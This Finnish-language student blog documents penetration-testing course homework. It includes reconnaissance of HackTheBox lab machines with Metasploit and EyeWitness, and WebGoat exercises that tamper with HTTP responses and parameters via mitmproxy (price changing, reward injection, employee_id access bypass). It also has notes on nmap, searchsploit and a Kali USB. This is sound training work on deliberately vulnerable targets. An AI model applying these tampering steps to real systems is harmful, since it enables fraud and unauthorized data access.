Menin MetaSploit:iin hakemaan kaikkien skannattujen palvelinten IPt. Käytän tähän vaarallista lippua -R, koska RHOST asettaa kaikki koneet maalitauluksi hyökkäyksille eli komennolla “hosts -R” tekee tiedoston kansioon /tmp/msf-db-rhosts-20190523-32617-182v4ck, sitten komennolla “cat /tmp/msf-db-rhosts-20190523-32617-182v4ck | tee /root/eyes/hosts” kopioin kaikki IPt suoraan eyes kansioon. Komennolla “eyewitness -f /root/eyes/hosts –web –prepend-https” otan kuvat niistä palvelimista, joissa eyewitness tunnistaa index.html kotisivun.

Kuva: Kuvasta voidaan päätellä, että palvelimella ehkä Apacheen ja IIS:ään liittyen kesken, koska molemmissa päällä testisivu.

Kotisivun kuvan kaappauksista saadaan tietoa siitä minkälaisia Web- palveluita palvelin ylläpitää.

HackTheBox Graafinen sivu

Menin HackTheBox:in sivulle etsimään tehtäviä, jotka voisivat olla helppoja kohteita. Etsin aktiivisista koneista suodattamalla helppouden mukaan neljä ensimmäistä:

  • 10.10.10.152 – Portti skannauksen mukaan koneella portit 21 FTP, 135 MSRPC, 139Netbios-ssn, 445 Microsoft-Ds ja Ms-Wbt-Server.
Kuva: Ohjelman EyeWitness ottama kuva palvelimesta 10.10.10.152
  • 10.10.10.140 – Portti skannaus 80 HTTP ja 22 SSH.
Kuva: Ohjelman EyeWitness ottama kuva palvelimesta 10.10.10.140

  • 10.10.10.139 – Portti skannaus 80 HTTP ja 22 SSH.
Kuva: Ohjelman EyeWitness ottama kuva palvelimesta 10.10.10.139
  • 10.10.10.134 – Portti skannaus 22 SSH, 135 MSRPC, 139 Netbios-SSN ja 445 Microsoft-Ds. Kotisivuja EyeWitness ei tälle palvelimelle löytänyt.

Lähteet

Pohjana Tero Karvinen 2019: Penetration Testing kurssi, http://terokarvinen.com

Tehtävät:  http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits

Penetration testing H3

Tässä blogissa käytetyt menetelmät ovat väärin käytettynä laittomia, käytä omalla vastuulla.

WebGoatin Docker asennus ja MitmProxyn käyttöönotto Blogissa Penetration testing H2.

FoxyProxy Firefoxille

Asensin FoxyProxyn Firefox Add-ons sivulta suoraan “+Add to Firefox” linkistä. Konfiguroin FoxyProxyn WebGoat palvelinta varten menemällä alku asetuksista “+Add”.

Edit Proxy Local:iin lisäsin MitmProxyn käyttämän portin 8888 ja localhostin, koska käytän Proxyä paikallisesti.

Painoin juuri luomani Proxy linkityksen kohdasta Patterns.

Lisäsin Palvelun eli WebGoatin Dockerin portilla 8080 eli nyt MitmProxyä käytetään vain Sivulla localhost:8080/WebGoat. Nyt esim google.com ei torju yhteydenottojani.

WebGoat tehtävät AJAX Security

Tehtävissä näkyy vain vastaukset ei kaikkea mitä olen kokeillut kyseisiin tehtäviin.

DOM Injection

Tehtävässä on Websivulla nappi “Activate!”, joka on lukittu. Tehtävän tarkoitus saada napin lukitus pois.

Avasin Firefoxin ohjelman verkkosivujen tutkimiseen F12 näppäimellä. Etsin Inspectorilla kyseisen napin rivit, jossa luki rivi <input id=”SUBMIT” value=”Activate!” disabled=””… Vaihdoin riviltä tekstin disabled –> enabled.

Websivun-napin lukitus aukesi ja tehtävä on ratkaistu.

LAB: Client Side Filtering

Tehtävässä kirjauduttu käyttäjälle Moe Stooge, joka voi katsella kaikkien muiden palkka tietoja paitsi Neville Bartholomew:in. Tehtävässä tarkoituksena löytää Neville Bartholomews:in vuosi palkka.

Avasin valmiiksi konfiguroimani MitmProxyn ja painoin WebGoat palvelun sivulta Choose Employee, joka lähettää GET paketin josta tiedot pystyin lukemaan suoraan selko kielellä.

<tr id='112'>
 <td>112</td>
 <td>Neville</td>
 <td>Bartholomew</td>
 <td>111-111-1111</td>
 <td>450000</td>
</tr>

Tästä saadaan tieto Nevillen palkasta, joka on 450-tuhatta vuodessa eli tehtävä on ratkaistu.

XML Injection

Tehtävän tavoite avata asiakkaalle 836239 lisää palkintoja websivulle, joihin asiakkaalla ei ole oikeutta.

Avasin MitmProxyn kirjoitin asiakas ID, painoin Submit nappia ja etsin tiedoston, joka voisi olla tekemisissä tietojen lisäyksessä websivulle. Löysin GET funktion, joka tuo palkinnot sivulle, mutta tarvitsin vielä intersept toimintoa, joka menee päälle MitmProxyssä näppäimestä “i”. Kirjoitin intersept toimintoon sivun alku tunnuksen “attack” laitoin followin päälle näppäimillä “Shift+F” ja menin eteenpäin näppäimellä “a”. Löysin haluamani GET funktion ja lisäsin sen response-body:yn Core Duo Laptopin ja Hawaii Cruisen.

<root>
<reward>WebGoat Mug 20 Pts </reward>
<reward>WebGoat t-shirt 50 Pts </reward>
<reward>WebGoat Secure Kettle 30 Pts </reward>
<reward>WebGoat Core Duo Laptop 2000 Pts </reward>
<reward>WebGoat Hawaii Cruise 3000 Pts </reward>
</root>
 

Otin vielä intersept=attack pois päältä, ennekuin lähetin tiedoston eteenpäin näppäimillä “Shift+A”.

Lopuksi sain kaikki palkinnot valittua eli tehtävä ratkaistu.

JSON Injection

Tehtävänä vaihtaa kalliimpi lentolipun hinta halvemmaksi webbisivulla.

Aloitin täyttämällä kentät ja painamalla Submit, löysin MitmProxyllä GET paketin, joka sisälsi lennot, pysähdykset ja hinnat. Seuraavaksi käytin intercept toimintoa “i” näppäimellä attack hakusanalla siepatakseni paketin, jotta voin editoida ja lähettää tiedot väärällä hinnalla takaisin. Vaihdoin lennon hinnaksi 200$.

{
 "From": "Boston",
 "To": "Seattle",
 "flights": [
 {"stops": "0", "transit" : "N/A", "price": "$200"},
 {"stops": "2", "transit" : "Newark,Chicago", "price": "$300"}
 ]
 }

Kalliimman lennon hinta vaihtui 200$ ja pystyin valitsemaan ja lähettämään sen eli tehtävä ratkaistu.

Lähteet

Pohjana Tero Karvinen 2019: Penetration Testing kurssi, http://terokarvinen.com

FoxyProxy addon sivu: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/?src=search

Penetration testing H2

“a) Ratkaise jokin WebGoatin tehtävä. Hyödynsitkö jotain OWASP10 -haavoittuvuutta? Mitä niistä?
b) Mainitse esimerkki MITRE:n Att&ck tekniikasta, joka soveltuu weppiin. Osaatko antaa esimerkin hyökkäyksestä tai haittaohjelmasta, jossa sitä on käytetty?”

Tehtävät: http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits

Tässä blogissa käytetyt menetelmät ovat väärin käytettynä laittomia, käytä omalla vastuulla.

Tehtävät tehdään Kali Linux Xfce 64-Bit käyttöjärjestelmään, joka on avattu Live tilaan muistitikulta.

WebGoat Dockerille

Ensin asensin Dockerin komennolla “apt-get install docker.io“. Sitten DockerHubin sivun mukaan asensin Dockerille Webgoat version 7.1 komennoilla “docker pull webgoat/webgoat-7.1” ja “docker run -p 8080:8080 -t webgoat/webgoat-7.1“.

Avasin Firefox selaimen ja menin osoitteeseen localhost:8080/WebGoat, johon nyt aukesi juuri asentamani WebGoat palvelimen etusivu.

WebGoat tehtävä Stage:3 Bypass Data Layer Access Controll.

Avasin ensin MitmProxyn komennolla “EDITOR=nano mitmproxy -p 8888“, Kali Linuxissa MitmProxy on valmiiksi asennettuna. Proxy pitää vielä laitaa toimintaan Firefox selaimeen, jota käytän WebGoat tehtävään. Firefox selaimen asetuksista etsin Proxy asetukset ja vaihdoin ne portin 8888 kautta eli MitmProxyn kautta.

Kuva: Firefox Proxy asetukset.

WebGoat tehtävänä oli kirjaudu käyttäjällä Tom ja yrittää päästä käsiksi toisen työn tekijän profiiliin.

Aloitin kirjautumalla käyttäjälle Tom Cat salasanalla tom.

Käyttäjällä Tom Cat painoin nappia “ViewProfile” ja etsin MitmProxyllä POST pyyntöä Web-palvelimelta.

Avasin POST pyyntö paketin ja editoin pyyntöä painamalla “E” ja valitsemalla “form”.

Vaihdoin taulun employee_id:n 105:stä 104:ään tallensin tiedon kenttään “TAB” näppäimellä ja poistuin “Q” näppäimellä.

Näppäimellä “R” lähetin uuden sivun Web-palvelimelle uudella id:llä. Response sivulla luki, että läpäisin tehtävän ja jatka seuraavaan eli pääsin toisen käyttäjän tietoihin käsiksi.

Tämä tehtävä hyödynsi OWASP Top10 A5 Broken Access Control haavoituvaisuutta.

MITRE Att&ck

Endpoint Denial of Service eli palvelun esto hyökkäys. Palvelun käytettävyys voidaan estää pommittamalla palvelimelle niin paljon turhia paketteja, että oikeiden käyttäjien palvelun käyttö estyy tai hidastuu.

Yleisesti tätä hyökkäys tapaa käytetään helppouden takia verkkopeleissä potkimaan vastustajat ulos pelistä ja isojen yrityksien palveluiden kaatamiseen botti verkoilla eli yleiseen kiusan tekoon tai aktivismiin.

Lähteet

Pohjana Tero Karvinen 2012: Palvelinten hallinta kurssi, http://terokarvinen.com

Tehtävät:  http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits

WebGoat Docker asennus ohjeet: https://hub.docker.com/r/webgoat/webgoat-7.1/

Endpoint Denial of Service https://attack.mitre.org/techniques/T1499/

Penetration testing H1

“a) CTF walktrough. Katso verkosta (esim Youtubesta) jonkin capture the flag -kilpailun ratkaisu. Mitä uusia työkaluja opit? Kokeile jotain mainittua työkalua (tarvittaessa koneella, joka ei ole kiinni Internetissä).
b) Kali Live USB. Tee Kali Live USB -tikku. Kokele, että se käynnistyy. Vinkki: käytä USB3-tikkua ja dd:tä. Olet tarkkana, mitä laitat of= kohtaan, ettet kirjoita kovalevysi päälle.”

Tehtävät: http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits

Tässä blogissa käytetyt menetelmät ovat väärin käytettynä laittomia, käytä omalla vastuulla.

Capture the Flag läpikäynti

Eri työkalut videossa:

Xerosploit – Xerosploit on tunkeutumiskokeiden työkalu kirjasto, jonka tavoitteena on suorittaa välimies hyökkäyksiä.

Nmap – Porttiskanneri ja verkkotutkimustyökalu.

Nikto – Tarkistaa palvelimen vanhentuneet versiot, versiokohtaiset ongelmat, palvelimen kokoonpanoasetukset ja yrittää tunnistaa asennetut web-palvelimet ja ohjelmistot.

DIRB – Web Content Scanner, joka etsii olemassa olevia ja piilotettuja Web-objekteja.

BurpSuite – Välimies hyökkäys työkalu, haavoittuvuus skanneri ja kirjasto yli sadasta yleisestä haavoittuvuudesta.

Searchsploit – Tietokanta tunnetuista haavoittuvuuksista.

Työkalujen kokeilu Kali Linuxilla

Searchsploit

Searchsploit on Kali Linuxilla valmiiksi asennettu kirjasto tunnetuista haavoittuvuuksista. Katsoin komennolla “seatchsploit ssh -w” tunnettuja SSH:n haavoittuvaisuuksia.

Nmap

Nmap portti skannaus ohjelmistolla kokeilin skannata Kali Linuxin localhost osoitetta. Ensin asensin UFW palomuurin komennolla “apt-get install ufw“, jonka sain päälle komennolla “ufw enable” ja avasin samalla portin SSH:lle komennolla “ufw allow 22/tcp“. Sitten asensin SSH:n komennolla “apt-get install ssh“. Uudelleen käynnistin UFW palomuurin komennolla “systemctl restart ufw” Kokeilin portti skannausta komennolla “nmap localhost” Nmap ei jostain syystä löytänyt avonaista SSH 22/TCP porttia, vaikka komento “ufw status verbose” kertoi portin olevan auki.

Kokeilin vielä aamulla koulussa Kali Linuxilla samoja komentoja ja nyt toimii oikein ja kertoo, että portti 22/TCP auki.

Kali Linux Live USB tikku

Kali Linux asennus Xubuntulla live tilassa, latasin Kali Linuxin .iso tiedosto kali.org/downloads sivulta. Valitsin opettajan ohjeen mukaan version: Kali Linux Xfce 64 Bit.

Navigoin kansioon /home/joni/downloads bash terminaalissa, johon asensin Kali Linuxin .iso tiedoston. Tein Kali Linux sivun omien ohjeiden mukaan ja suoritin komennon “sudo fdisk -l“, joka kertoi missä asemassa muistitikku sijaitsee ja “dd if=kali-linux-xfce-2019.1a-amd64.iso of=/dev/sdb bs=512k“, joka asensi tikulle Kali Linuxin. Kokeilin tikun toimivuuden koulun koneella live tilassa, joka toimi oletetusti.

Lähteet

Pohjana Tero Karvinen 2019: Penetration Testing kurssi, http://terokarvinen.com

Tehtävät:  http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits

CTF ratkaisu video YouTubessa: https://youtu.be/q1jwwJFpB_A

Kali Live tikku ohje: https://docs.kali.org/downloading/kali-linux-live-usb-install

Kali Linux asennus tiedostot: https://www.kali.org/downloads/

Xerosploit: https://github.com/LionSec/xerosploit

Nikto: https://cirt.net/Nikto2

DIRB: https://tools.kali.org/web-applications/dirb

BurpSuite: https://portswigger.net/burp

Searchsploit: https://www.exploit-db.com/searchsploit